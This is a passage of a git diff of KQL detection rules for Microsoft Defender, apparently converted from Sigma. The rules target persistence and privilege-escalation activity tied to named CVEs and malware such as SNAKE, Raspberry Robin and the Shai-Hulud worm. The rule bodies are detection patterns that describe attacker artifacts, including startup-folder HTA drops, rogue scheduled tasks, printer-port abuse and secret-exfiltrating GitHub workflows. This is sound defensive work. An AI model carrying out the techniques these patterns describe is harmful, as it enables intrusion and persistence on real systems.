100644 --- a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader -// Author: Gregory -// Date: 2023-10-11 -// Level: high -// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats - -DeviceFileEvents +// Title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader +// Author: Gregory +// Date: 2023-10-11 +// Level: high +// Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.001, cve.2023-27363, detection.emerging-threats + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\FoxitPDFReader.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" and FolderPath endswith ".hta" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql index 4fe9a997..4556f6f1 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql @@ -1,10 +1,10 @@ -// Title: Potential CVE-2023-36884 Exploitation Dropped File -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2023-07-13 -// Level: medium -// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats - -DeviceFileEvents +// Title: Potential CVE-2023-36884 Exploitation Dropped File +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2023-07-13 +// Level: medium +// Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, cve.2023-36884, detection.emerging-threats + +DeviceFileEvents | where FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" and FolderPath endswith "\\file001.url" and FolderPath startswith "C:\\Users\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql index 56c86dbc..1df0b250 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql @@ -1,12 +1,12 @@ -// Title: Potential Encrypted Registry Blob Related To SNAKE Malware -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-10 -// Level: medium -// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.emerging-threats -// False Positives: -// - Some additional tuning might be required to tune out legitimate processes that write to this key by default - -DeviceRegistryEvents +// Title: Potential Encrypted Registry Blob Related To SNAKE Malware +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: medium +// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats +// False Positives: +// - Some additional tuning might be required to tune out legitimate processes that write to this key by default + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*" and (not((RegistryKey endswith ".AssocFile.WAV" or RegistryKey contains ".wav."))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql index 6fbff8d4..697c24cb 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql @@ -1,11 +1,11 @@ -// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024-03-22 -// Level: medium -// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. -// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential KamiKakaBot Activity - Shutdown Schedule Task Creation +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2024-03-22 +// Level: medium +// Description: Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. +// This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "shutdown /l /f" and ProcessCommandLine contains "WEEKLY") and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql index 7ed90560..26388339 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql @@ -1,10 +1,10 @@ -// Title: Potential NetWire RAT Activity - Registry -// Author: Christopher Peacock -// Date: 2021-10-07 -// Level: high -// Description: Detects registry keys related to NetWire RAT -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats - -DeviceRegistryEvents +// Title: Potential NetWire RAT Activity - Registry +// Author: Christopher Peacock +// Date: 2021-10-07 +// Level: high +// Description: Detects registry keys related to NetWire RAT +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey contains "\\software\\NetWire" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql index 606fce61..49dd5d56 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql @@ -1,12 +1,12 @@ -// Title: Potential Notepad++ CVE-2025-49144 Exploitation -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-26 -// Level: high -// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path. -// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer. -// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats - -DeviceProcessEvents +// Title: Potential Notepad++ CVE-2025-49144 Exploitation +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-26 +// Level: high +// Description: Detects potential exploitation of CVE-2025-49144, a local privilege escalation vulnerability in Notepad++ installers (v8.8.1 and prior) where the installer calls regsvr32.exe without specifying the full path. +// This allows an attacker to execute arbitrary code with elevated privileges by placing a malicious regsvr32.exe alongside this Legitimate Notepad++ installer. +// The vulnerability is triggered when the installer attempts to register the NppShell.dll file, which is a component of Notepad++. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.008, cve.2025-49144, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "\\contextMenu\\NppShell.dll" and ProcessCommandLine startswith "regsvr32 /s" and FolderPath endswith "\\regsvr32.exe") and (not((FolderPath in~ ("C:\\Windows\\System32\\regsvr32.exe", "C:\\Windows\\SysWOW64\\regsvr32.exe")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql index 127ba1e2..9a97d582 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql @@ -1,10 +1,10 @@ -// Title: Potential PrintNightmare Exploitation Attempt -// Author: Bhabesh Raj -// Date: 2021-07-01 -// Level: high -// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats - -DeviceFileEvents +// Title: Potential PrintNightmare Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-07-01 +// Level: high +// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql index 63cba99d..cdbe156e 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql @@ -1,11 +1,11 @@ -// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap -// Author: Swachchhanda Shrawan Poudel -// Date: 2024-07-31 -// Level: low -// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. -// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats - -DeviceRegistryEvents +// Title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-31 +// Level: low +// Description: Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. +// Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion, detection.emerging-threats + +DeviceRegistryEvents | where (((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\") or InitiatingProcessFolderPath endswith "\\control.exe") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap*") and ((RegistryValueData contains "DWORD (0x00000000)" and RegistryKey endswith "\\AutoDetect") or (RegistryValueData contains "DWORD (0x00000001)" and (RegistryKey endswith "\\IntranetName" or RegistryKey endswith "\\ProxyByPass" or RegistryKey endswith "\\UNCAsIntranet"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql index 17a51abf..84dec431 100644 --- a/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql +++ b/KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql @@ -1,10 +1,10 @@ -// Title: Potential Ursnif Malware Activity - Registry -// Author: megan201296 -// Date: 2019-02-13 -// Level: high -// Description: Detects registry keys related to Ursnif malware. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats - -DeviceRegistryEvents +// Title: Potential Ursnif Malware Activity - Registry +// Author: megan201296 +// Date: 2019-02-13 +// Level: high +// Description: Detects registry keys related to Ursnif malware. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.execution, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey endswith "\\Software\\AppDataLow\\Software\\Microsoft\\3A861D62-51E0-7C9D-AB0E-15700F2219A4" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql index d5c956e7..eec23dce 100644 --- a/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql +++ b/KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql @@ -1,13 +1,13 @@ -// Title: ScreenConnect User Database Modification -// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress -// Date: 2024-02-21 -// Level: medium -// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. -// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. -// MITRE Tactic: Persistence -// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats -// False Positives: -// - This will occur legitimately as well and will result in some benign activity. - -DeviceFileEvents +// Title: ScreenConnect User Database Modification +// Author: Matt Anderson, Andrew Schwartz, Caleb Stewart, Huntress +// Date: 2024-02-21 +// Level: medium +// Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. +// This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. +// MITRE Tactic: Persistence +// Tags: attack.persistence, cve.2024-1709, detection.emerging-threats +// False Positives: +// - This will occur legitimately as well and will result in some benign activity. + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\ScreenConnect.Service.exe" and (FolderPath contains "Temp" and FolderPath contains "ScreenConnect") and FolderPath endswith ".xml" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql index ff5530e3..11642822 100644 --- a/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql +++ b/KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql @@ -1,12 +1,12 @@ -// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-14 -// Level: critical -// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-14 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "whoami" and ((ProcessCommandLine contains "./Client/Common/" or ProcessCommandLine contains ".\\Client\\Common\\") or ProcessCommandLine contains "C:\\Windows\\Temp\\Serv-U.bat") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql index f4b1f212..65049b31 100644 --- a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql +++ b/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql @@ -1,12 +1,12 @@ -// Title: Shai-Hulud Malicious GitHub Workflow Creation -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-24 -// Level: high -// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Shai-Hulud Malicious GitHub Workflow Creation +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: high +// Description: Detects creation of shai-hulud-workflow.yml file associated with Shai Hulud worm targeting NPM supply chain attack that exfiltrates GitHub secrets +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.credential-access, attack.t1552.001, attack.collection, attack.t1119, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ".github/workflows/shai-hulud-workflow.yml" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql index 4873205b..bec70afe 100644 --- a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql +++ b/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql @@ -1,12 +1,12 @@ -// Title: Small Sieve Malware Registry Persistence -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-19 -// Level: high -// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Small Sieve Malware Registry Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: high +// Description: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run*" and (RegistryKey contains "Microsift" or RegistryValueData contains ".exe Platypus") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql index 947bc083..76302e5e 100644 --- a/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql +++ b/KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql @@ -1,10 +1,10 @@ -// Title: SNAKE Malware Covert Store Registry Key -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-11 -// Level: high -// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA -// MITRE Tactic: Persistence -// Tags: attack.persistence, detection.emerging-threats - -DeviceRegistryEvents +// Title: SNAKE Malware Covert Store Registry Key +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-11 +// Level: high +// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA +// MITRE Tactic: Persistence +// Tags: attack.persistence, detection.emerging-threats + +DeviceRegistryEvents | where RegistryKey endswith "SECURITY\\Policy\\Secrets\\n" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql index 3332cc7a..04ffdd6d 100644 --- a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql +++ b/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql @@ -1,10 +1,10 @@ -// Title: SOURGUM Actor Behaviours -// Author: MSTIC, FPT.EagleEye -// Date: 2021-06-15 -// Level: high -// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM -// MITRE Tactic: Persistence -// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats - -DeviceProcessEvents +// Title: SOURGUM Actor Behaviours +// Author: MSTIC, FPT.EagleEye +// Date: 2021-06-15 +// Level: high +// Description: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM +// MITRE Tactic: Persistence +// Tags: attack.t1546, attack.t1546.015, attack.persistence, attack.privilege-escalation, detection.emerging-threats + +DeviceProcessEvents | where (FolderPath contains "windows\\system32\\Physmem.sys" or FolderPath contains "Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini") or ((ProcessCommandLine contains "reg add" and (FolderPath contains "windows\\system32\\filepath2" or FolderPath contains "windows\\system32\\ime")) and (ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32" or ProcessCommandLine contains "HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql index 97a5181a..d6ec9f06 100644 --- a/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql +++ b/KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql @@ -1,12 +1,12 @@ -// Title: Suspicious PrinterPorts Creation (CVE-2020-1048) -// Author: EagleEye Team, Florian Roth -// Date: 2020-05-13 -// Level: high -// Description: Detects new commands that add new printer port which point to suspicious file -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats -// False Positives: -// - New printer port install on host - -DeviceProcessEvents +// Title: Suspicious PrinterPorts Creation (CVE-2020-1048) +// Author: EagleEye Team, Florian Roth +// Date: 2020-05-13 +// Level: high +// Description: Detects new commands that add new printer port which point to suspicious file +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.001, cve.2020-1048, detection.emerging-threats +// False Positives: +// - New printer port install on host + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-PrinterPort -Name" and (ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bat")) or ProcessCommandLine contains "Generic / Text Only" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql index d403c1fd..0f4c8646 100644 --- a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql +++ b/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Process Spawned by CentreStack Portal AppPool -// Author: Jason Rathbun (Blackpoint Cyber) -// Date: 2025-04-17 -// Level: high -// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats -// False Positives: -// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal. - -DeviceProcessEvents +// Title: Suspicious Process Spawned by CentreStack Portal AppPool +// Author: Jason Rathbun (Blackpoint Cyber) +// Date: 2025-04-17 +// Level: high +// Description: Detects unexpected command shell execution (cmd.exe) from w3wp.exe when tied to CentreStack's portal.config, indicating potential exploitation (e.g., CVE-2025-30406) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1059.003, attack.t1505.003, cve.2025-30406, detection.emerging-threats +// False Positives: +// - Potentially if other portal services run on w3wp with a apppool\portal\portal.config, if you want to increase scope you could add user IIS APPPOOL\portal. + +DeviceProcessEvents | where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "\\portal\\portal.config" and InitiatingProcessFolderPath endswith "\\w3wp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql index 91935847..12d977c9 100644 --- a/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql +++ b/KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql @@ -1,12 +1,12 @@ -// Title: Windows Spooler Service Suspicious Binary Load -// Author: FPT.EagleEye, Thomas Patzke (improvements) -// Date: 2021-06-29 -// Level: informational -// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats -// False Positives: -// - Loading of legitimate driver - -DeviceImageLoadEvents +// Title: Windows Spooler Service Suspicious Binary Load +// Author: FPT.EagleEye, Thomas Patzke (improvements) +// Date: 2021-06-29 +// Level: informational +// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Loading of legitimate driver + +DeviceImageLoadEvents | where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql index f839c135..5ca2cf40 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql @@ -1,12 +1,12 @@ -// Title: APT27 - Emissary Panda Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2018-09-03 -// Level: critical -// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: APT27 - Emissary Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2018-09-03 +// Level: critical +// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath endswith "\\sllauncher.exe") or (ProcessCommandLine contains "-k" and FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql index 5b225c54..c8c23753 100644 --- a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql +++ b/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql @@ -1,12 +1,12 @@ -// Title: ChromeLoader Malware Execution -// Author: @kostastsale -// Date: 2022-01-10 -// Level: high -// Description: Detects execution of ChromeLoader malware via a registered scheduled task -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001, attack.t1176, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: ChromeLoader Malware Execution +// Author: @kostastsale +// Date: 2022-01-10 +// Level: high +// Description: Detects execution of ChromeLoader malware via a registered scheduled task +// 